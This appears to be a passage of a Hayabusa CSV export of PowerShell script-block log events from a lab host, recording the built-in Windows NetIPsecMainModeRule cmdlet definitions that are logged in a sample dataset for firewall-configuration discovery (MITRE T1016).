[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value 
= ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value 
= $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] 
param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { 